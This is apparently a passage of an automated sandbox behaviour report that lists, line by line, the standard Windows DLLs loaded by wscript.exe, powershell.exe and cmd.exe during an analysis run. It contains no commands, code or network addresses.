Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\cmd.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\cmd.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\cmd.exe Section loaded: wldp.dll
Source: C:\Windows\System32\cmd.exe Section loaded: propsys.dll
Source: C:\Windows\System32\cmd.exe Section loaded: profapi.dll
Source: C:\Windows\System32\cmd.exe Section loaded: edputil.dll
Source: C:\Windows\System32\cmd.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\cmd.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\cmd.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\cmd.exe Section loaded: netutils.dll
Source: C:\Windows\System32\cmd.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\cmd.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\cmd.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\cmd.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\cmd.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\cmd.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\cmd.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\cmd.exe Section loaded: slc.dll
Source: C:\Windows\System32\cmd.exe Section loaded: userenv.dll
Source: C:\Windows\System32\cmd.exe Section loaded: sppc.dll
Source: C:\Windows\System32\cmd.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\cmd.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe Section loaded: pcacli.dll
Source: C:\Windows\System32\cmd.exe Section loaded: mpr.dll
Source: C:\Windows\System32\cmd.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\cmd.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\cmd.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\cmd.exe Section loaded: wldp.dll
Source: C:\Windows\System32\cmd.exe Section loaded: propsys.dll
Source: C:\Windows\System32\cmd.exe Section loaded: profapi.dll
Source: C:\Windows\System32\cmd.exe Section loaded: edputil.dll
Source: C:\Windows\System32\cmd.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\cmd.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\cmd.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\cmd.exe Section loaded: netutils.dll
Source: C:\Windows\System32\cmd.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\cmd.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\cmd.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\cmd.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\cmd.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\cmd.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\cmd.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\cmd.exe Section loaded: slc.dll
Source: C:\Windows\System32\cmd.exe Section loaded: userenv.dll
Source: C:\Windows\System32\cmd.exe Section loaded: sppc.dll
Source: C:\Windows\System32\cmd.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\cmd.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe Section loaded: pcacli.dll
Source: C:\Windows\System32\cmd.exe Section loaded: mpr.dll
Source: C:\Windows\System32\cmd.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
